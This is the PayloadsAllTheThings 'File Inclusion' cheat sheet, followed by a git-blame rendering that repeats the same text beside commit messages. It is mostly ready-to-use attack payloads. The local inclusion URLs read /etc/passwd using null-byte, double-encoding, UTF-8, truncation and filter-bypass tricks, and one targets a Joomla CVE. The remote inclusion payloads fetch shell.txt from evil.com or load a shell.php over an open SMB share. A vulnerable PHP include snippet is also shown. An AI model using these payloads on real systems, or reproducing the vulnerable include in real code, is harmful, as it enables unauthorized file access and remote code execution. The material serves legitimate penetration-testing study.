PayloadsAllTheThings/File Inclusion/README.md

# File Inclusion

> A File Inclusion Vulnerability refers to a type of security vulnerability in web applications, particularly prevalent in applications developed in PHP, where an attacker can include a file, usually exploiting a lack of proper input/output sanitization. This vulnerability can lead to a range of malicious activities, including code execution, data theft, and website defacement.

## Summary

- [Tools](#tools)
- [Local File Inclusion](#local-file-inclusion)
    - [Null Byte](#null-byte)
    - [Double Encoding](#double-encoding)
    - [UTF-8 Encoding](#utf-8-encoding)
    - [Path Truncation](#path-truncation)
    - [Filter Bypass](#filter-bypass)
- [Remote File Inclusion](#remote-file-inclusion)
    - [Null Byte](#null-byte-1)
    - [Double Encoding](#double-encoding-1)
    - [Bypass allow_url_include](#bypass-allow_url_include)
- [Labs](#labs)
- [References](#references)


## Tools

* [P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) (archived on Oct 7, 2020) - kadimus is a tool to check and exploit lfi vulnerability.
* [D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
* [kurobeats/fimap](https://github.com/kurobeats/fimap) - fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps.
* [lightos/Panoptic](https://github.com/lightos/Panoptic) - Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through path traversal vulnerabilities.
* [hansmach1ne/LFImap](https://github.com/hansmach1ne/LFImap) - Local File Inclusion discovery and exploitation tool


## Local File Inclusion

**File Inclusion Vulnerability** should be differentiated from **Path Traversal**. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application, when the File Inclusion will lead to the execution of arbitrary code.

Consider a PHP script that includes a file based on user input. If proper sanitization is not in place, an attacker could manipulate the `page` parameter to include local or remote files, leading to unauthorized access or code execution.

```php
<?php
$file = $_GET['page'];
include($file);
?>
```

In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files.

```powershell
http://example.com/index.php?page=../../../etc/passwd
```


### Null Byte

:warning: In versions of PHP below 5.3.4 we can terminate with null byte (`%00`).

```powershell
http://example.com/index.php?page=../../../etc/passwd%00
```

**Example**: Joomla! Component Web TV 1.0 - CVE-2010-1470

```ps1
{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
```


### Double Encoding

```powershell
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```


### UTF-8 Encoding

```powershell
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
```

### Path Truncation

On most PHP installations a filename longer than `4096` bytes will be cut off so any excess chars will be thrown away.

```powershell
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] 
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
```

### Filter Bypass

```powershell
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
```


## Remote File Inclusion

> Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input.

Remote File Inclusion doesn't work anymore on a default configuration since `allow_url_include` is now disabled since PHP 5.

```ini
allow_url_include = On
```


Most of the filter bypasses from LFI section can be reused for RFI.

```powershell
http://example.com/index.php?page=http://evil.com/shell.txt
```

### Null Byte

```powershell
http://example.com/index.php?page=http://evil.com/shell.txt%00
```


### Double Encoding

```powershell
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
```


### Bypass allow_url_include

When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol.

1. Create a share open to everyone
2. Write a PHP code inside a file : `shell.php`
3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php`


## Labs

* [Root Me - Local File Inclusion](https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion)
* [Root Me - Local File Inclusion - Double encoding](https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion-Double-encoding)
* [Root Me - Remote File Inclusion](https://www.root-me.org/en/Challenges/Web-Server/Remote-File-Inclusion)
* [Root Me - PHP - Filters](https://www.root-me.org/en/Challenges/Web-Server/PHP-Filters)


## References

* [CVV #1: Local File Inclusion - SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - 2019-05-12](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html)
* [Is PHP vulnerable and under what conditions? - April 13, 2015 - Andreas Venieris](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
* [LFI Cheat Sheet - @Arr0way - 24 Apr 2016](https://highon.coffee/blog/lfi-cheat-sheet/)
* [Testing for Local File Inclusion - OWASP - 25 June 2017](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
* [Turning LFI into RFI - Grayson Christopher - 2017-08-14](https://web.archive.org/web/20170815004721/https://l.avala.mp/?p=241)
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00			`# File Inclusion`
Markdown formatting update 2018-08-12 21:30:22 +00:00
LFI with pearcmd.php 2023-10-02 10:52:10 +00:00			`> A File Inclusion Vulnerability refers to a type of security vulnerability in web applications, particularly prevalent in applications developed in PHP, where an attacker can include a file, usually exploiting a lack of proper input/output sanitization. This vulnerability can lead to a range of malicious activities, including code execution, data theft, and website defacement.`
PHP Include payloads 2016-10-20 02:39:06 +00:00
Path traversal refactor + AD cme module msf/empire + IIS web.config 2018-07-07 10:04:55 +00:00			`## Summary`
Markdown formatting update 2018-08-12 21:30:22 +00:00
References updated for Dom Clobbering, File Inclusion 2024-11-05 16:29:15 +00:00			`- [Tools](#tools)`
			`- [Local File Inclusion](#local-file-inclusion)`
LFI/RFI pages 2024-11-29 10:52:51 +00:00			`- [Null Byte](#null-byte)`
			`- [Double Encoding](#double-encoding)`
			`- [UTF-8 Encoding](#utf-8-encoding)`
			`- [Path Truncation](#path-truncation)`
			`- [Filter Bypass](#filter-bypass)`
References updated for Dom Clobbering, File Inclusion 2024-11-05 16:29:15 +00:00			`- [Remote File Inclusion](#remote-file-inclusion)`
LFI/RFI pages 2024-11-29 10:52:51 +00:00			`- [Null Byte](#null-byte-1)`
			`- [Double Encoding](#double-encoding-1)`
fix: Fix spelling 2022-08-09 09:02:21 +00:00			`- [Bypass allow_url_include](#bypass-allow_url_include)`
Challenges added for CRLF, Command Injection, File Inclusion 2024-11-12 18:01:34 +00:00			`- [Labs](#labs)`
References updated for Dom Clobbering, File Inclusion 2024-11-05 16:29:15 +00:00			`- [References](#references)`

Path traversal refactor + AD cme module msf/empire + IIS web.config 2018-07-07 10:04:55 +00:00
plink + sshuttle : Network Pivoting Techniques 2019-06-09 16:13:15 +00:00			`## Tools`

References updated for Dom Clobbering, File Inclusion 2024-11-05 16:29:15 +00:00			`* [P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) (archived on Oct 7, 2020) - kadimus is a tool to check and exploit lfi vulnerability.`
			`* [D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner`
			`* [kurobeats/fimap](https://github.com/kurobeats/fimap) - fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps.`
			`* [lightos/Panoptic](https://github.com/lightos/Panoptic) - Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through path traversal vulnerabilities.`
			`* [hansmach1ne/LFImap](https://github.com/hansmach1ne/LFImap) - Local File Inclusion discovery and exploitation tool`
plink + sshuttle : Network Pivoting Techniques 2019-06-09 16:13:15 +00:00
LFI with pearcmd.php 2023-10-02 10:52:10 +00:00
			`## Local File Inclusion`

LFI/RFI pages 2024-11-29 10:52:51 +00:00			`File Inclusion Vulnerability should be differentiated from Path Traversal. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application, when the File Inclusion will lead to the execution of arbitrary code.`

LFI with pearcmd.php 2023-10-02 10:52:10 +00:00			Consider a PHP script that includes a file based on user input. If proper sanitization is not in place, an attacker could manipulate the `page` parameter to include local or remote files, leading to unauthorized access or code execution.

			```php
			`<?php`
			`$file = $_GET['page'];`
			`include($file);`
			`?>`
			```
Markdown formatting update 2018-08-12 21:30:22 +00:00
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00			In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files.

Markdown formatting update 2018-08-12 21:30:22 +00:00			```powershell
LFI - PHPSessid technique, more bypass and files 2017-09-23 22:32:55 +00:00			`http://example.com/index.php?page=../../../etc/passwd`
Path traversal refactor + AD cme module msf/empire + IIS web.config 2018-07-07 10:04:55 +00:00			```
LFI - PHPSessid technique, more bypass and files 2017-09-23 22:32:55 +00:00
Markdown formatting update 2018-08-12 21:30:22 +00:00
LFI/RFI pages 2024-11-29 10:52:51 +00:00
			`### Null Byte`

			:warning: In versions of PHP below 5.3.4 we can terminate with null byte (`%00`).
Add root user + PHP null byte version 2019-06-23 22:21:39 +00:00
Markdown formatting update 2018-08-12 21:30:22 +00:00			```powershell
LFI - PHPSessid technique, more bypass and files 2017-09-23 22:32:55 +00:00			`http://example.com/index.php?page=../../../etc/passwd%00`
Path traversal refactor + AD cme module msf/empire + IIS web.config 2018-07-07 10:04:55 +00:00			```
LFI - PHPSessid technique, more bypass and files 2017-09-23 22:32:55 +00:00
LFI/RFI pages 2024-11-29 10:52:51 +00:00			`Example: Joomla! Component Web TV 1.0 - CVE-2010-1470`

			```ps1
			`{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00`
			```


			`### Double Encoding`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```powershell
LFI - PHPSessid technique, more bypass and files 2017-09-23 22:32:55 +00:00			`http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd`
			`http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00`
Path traversal refactor + AD cme module msf/empire + IIS web.config 2018-07-07 10:04:55 +00:00			```
LFI - PHPSessid technique, more bypass and files 2017-09-23 22:32:55 +00:00
LFI/RFI pages 2024-11-29 10:52:51 +00:00
			`### UTF-8 Encoding`
UTF-8 encoding for File Inclusion 2019-06-29 09:20:17 +00:00
			```powershell
			`http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd`
			`http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00`
			```

LFI/RFI pages 2024-11-29 10:52:51 +00:00			`### Path Truncation`
Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp 2019-05-12 19:34:09 +00:00
LFI with pearcmd.php 2023-10-02 10:52:10 +00:00			On most PHP installations a filename longer than `4096` bytes will be cut off so any excess chars will be thrown away.
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```powershell
RFI - Windows SMB allow_url_include = "Off" 2019-05-12 20:23:55 +00:00			`http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]`
			`http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]`
			`http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE]`
			`http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd`
Path traversal refactor + AD cme module msf/empire + IIS web.config 2018-07-07 10:04:55 +00:00			```
LFI - PHPSessid technique, more bypass and files 2017-09-23 22:32:55 +00:00
LFI/RFI pages 2024-11-29 10:52:51 +00:00			`### Filter Bypass`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```powershell
LFI - PHPSessid technique, more bypass and files 2017-09-23 22:32:55 +00:00			`http://example.com/index.php?page=....//....//etc/passwd`
			`http://example.com/index.php?page=..///////..////..//////etc/passwd`
Path traversal refactor + AD cme module msf/empire + IIS web.config 2018-07-07 10:04:55 +00:00			`http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd`
LFI via /proc/*/fd + upload 2017-08-15 00:37:09 +00:00			```

LFI with pearcmd.php 2023-10-02 10:52:10 +00:00
			`## Remote File Inclusion`

			`> Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input.`

LFI/RFI pages 2024-11-29 10:52:51 +00:00			Remote File Inclusion doesn't work anymore on a default configuration since `allow_url_include` is now disabled since PHP 5.
LFI with pearcmd.php 2023-10-02 10:52:10 +00:00
			```ini
			`allow_url_include = On`
			```

Markdown formatting update 2018-08-12 21:30:22 +00:00
RFI - Windows SMB allow_url_include = "Off" 2019-05-12 20:23:55 +00:00			`Most of the filter bypasses from LFI section can be reused for RFI.`

Markdown formatting update 2018-08-12 21:30:22 +00:00			```powershell
LFI via /proc/*/fd + upload 2017-08-15 00:37:09 +00:00			`http://example.com/index.php?page=http://evil.com/shell.txt`
Path traversal refactor + AD cme module msf/empire + IIS web.config 2018-07-07 10:04:55 +00:00			```

LFI/RFI pages 2024-11-29 10:52:51 +00:00			`### Null Byte`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```powershell
LFI via /proc/*/fd + upload 2017-08-15 00:37:09 +00:00			`http://example.com/index.php?page=http://evil.com/shell.txt%00`
Path traversal refactor + AD cme module msf/empire + IIS web.config 2018-07-07 10:04:55 +00:00			```

LFI with pearcmd.php 2023-10-02 10:52:10 +00:00
LFI/RFI pages 2024-11-29 10:52:51 +00:00			`### Double Encoding`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```powershell
LFI via /proc/*/fd + upload 2017-08-15 00:37:09 +00:00			`http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt`
			```

LFI with pearcmd.php 2023-10-02 10:52:10 +00:00
RFI - Windows SMB allow_url_include = "Off" 2019-05-12 20:23:55 +00:00			`### Bypass allow_url_include`

			When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol.

			`1. Create a share open to everyone`
			2. Write a PHP code inside a file : `shell.php`
			3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php`


Challenges added for CRLF, Command Injection, File Inclusion 2024-11-12 18:01:34 +00:00			`## Labs`

			`* [Root Me - Local File Inclusion](https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion)`
			`* [Root Me - Local File Inclusion - Double encoding](https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion-Double-encoding)`
			`* [Root Me - Remote File Inclusion](https://www.root-me.org/en/Challenges/Web-Server/Remote-File-Inclusion)`
			`* [Root Me - PHP - Filters](https://www.root-me.org/en/Challenges/Web-Server/PHP-Filters)`


Adding references sectio 2018-12-24 14:02:50 +00:00			`## References`
Markdown formatting update 2018-08-12 21:30:22 +00:00
References updated for Dom Clobbering, File Inclusion 2024-11-05 16:29:15 +00:00			`* [CVV #1: Local File Inclusion - SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)`
			`* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - 2019-05-12](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html)`
			`* [Is PHP vulnerable and under what conditions? - April 13, 2015 - Andreas Venieris](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)`
			`* [LFI Cheat Sheet - @Arr0way - 24 Apr 2016](https://highon.coffee/blog/lfi-cheat-sheet/)`
			`* [Testing for Local File Inclusion - OWASP - 25 June 2017](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)`
LFI/RFI pages 2024-11-29 10:52:51 +00:00			`* [Turning LFI into RFI - Grayson Christopher - 2017-08-14](https://web.archive.org/web/20170815004721/https://l.avala.mp/?p=241)`